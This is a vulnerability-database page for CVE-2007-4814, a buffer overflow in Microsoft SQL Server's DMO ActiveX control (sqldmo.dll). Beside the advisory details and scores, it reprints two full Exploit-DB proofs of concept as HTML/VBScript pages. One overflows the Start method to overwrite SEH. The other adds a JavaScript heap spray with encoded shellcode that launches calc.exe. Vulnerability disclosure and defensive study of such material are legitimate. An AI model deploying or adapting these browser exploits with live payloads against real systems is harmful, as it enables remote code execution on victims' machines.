CVE-2007-4814 : Detail

CVE-2007-4814

Overflow
69.97%V3
Network
2007-09-11
17h00 +00:00
2018-10-15
18h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in the SQLServer ActiveX control in the Distributed Management Objects OLE DLL (sqldmo.dll) 2000.085.2004.00 in Microsoft SQL Server Enterprise Manager 8.05.2004 allows remote attackers to execute arbitrary code via a long second argument to the Start method.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 4379

Publication date : 2007-09-07 22h00 +00:00
Author : rgod
EDB Verified : Yes

<!-- 18.48 01/09/2007 Microsoft SQL Server Distributed Management Objects OLE DLL for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow poc file version: 2000.085.2004.00 product version: 8.05.2004 passing some fuzzy chars to Start method: EAX 00000000 ECX 00620062 EDX 00620062 EBX 1C3A3638 SQLDMO.1C3A3638 ESP 0013D87C EBP 0013DAA8 ESI 03042544 EDI 0013DAA0 ASCII "|T" EIP 1C1C9800 SQLDMO.1C1C9800 ... 1C1C97EA 8D8D E4FDFFFF LEA ECX,DWORD PTR SS:[EBP-21C] 1C1C97F0 51 PUSH ECX 1C1C97F1 8B95 E0FDFFFF MOV EDX,DWORD PTR SS:[EBP-220] 1C1C97F7 8B02 MOV EAX,DWORD PTR DS:[EDX] 1C1C97F9 8B8D E0FDFFFF MOV ECX,DWORD PTR SS:[EBP-220] 1C1C97FF 51 PUSH ECX 1C1C9800 FF90 DC010000 CALL DWORD PTR DS:[EAX+1DC] <--- exception access violation when reading 000001DC by manipulating edx you have the first exploitable condition... also seh is overwritten, then: EAX 00000000 ECX 00610061 EDX 7C9137D8 ntdll.7C9137D8 EBX 00000000 ESP 0013D4AC EBP 0013D4CC ESI 00000000 EDI 00000000 EIP 00610061 object safety report: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True means: works according to security settings for the Internet zone needs Activex "not marked as safe" option set to "ask" or "enabled" (not the predefined one) rgod. http://retrogod.altervista.org --> <html> <object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object> <script language='vbscript'> targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll" prototype = "Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )" memberName = "Start" progid = "SQLDMO.SQLServer" argCount = 4 'edx = ecx edx ="bb" seh ="aa" StartMode =True Server ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\tes.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te@st\tes\test\test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRRR\QQQQ\PP@PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCCC\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#$%\ttttt\ssss\rr@rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\fffff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\" Login ="aaaaaaaa" Password ="bbbbbbbb" SQLServer.Start StartMode ,Server ,Login ,Password </script> </html> # milw0rm.com [2007-09-08]
Exploit Database EDB-ID : 4398

Publication date : 2007-09-11 22h00 +00:00
Author : 96sysim
EDB Verified : Yes

<!-- + title: Microsoft SQL Server Distributed Management Objects Buffer Overflow + Critical: Critical (remote) + Impact: MS Internet Explorer 6 -> Code Execute + Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR + Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0) + Reference & Thanks : code by rgod http://www.milw0rm.com/exploits/4379 code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426 + Author: 96sysim (sysim@nate.com) --> <html> <object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object> <SCRIPT language="javascript"> // Heap Spray // execute "calc.exe" shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<501;i++) memory[i] = block + shellcode; </SCRIPT> <script language='vbscript'> targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll" prototype = "Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )" memberName = "Start" progid = "SQLDMO.SQLServer" argCount = 4 myseh = unescape("%u0D0D%u0D0D") // heap spray range - possible change StartMode =True Server ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\tes.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\DDDD\BBBB\AAA\A\\\\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te@st\tes\test\test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaaaa" + myseh + "Dmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRRR\QQQQ\PP@PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\DDDD\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#$%\ttttt\ssss\rr@rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\fffff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\" Login ="aaaaaaaa" Password ="bbbbbbbb" SQLServer.Start StartMode ,Server ,Login ,Password </script> </html> # milw0rm.com [2007-09-12]

Products Mentioned

Configuraton 0

Microsoft>>Sql_server >> Version 2005

References

http://securityreason.com/securityalert/3112
Tags : third-party-advisory, x_refsource_SREASON
https://www.exploit-db.com/exploits/4379
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/25594
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/4398
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.osvdb.org/38399
Tags : vdb-entry, x_refsource_OSVDB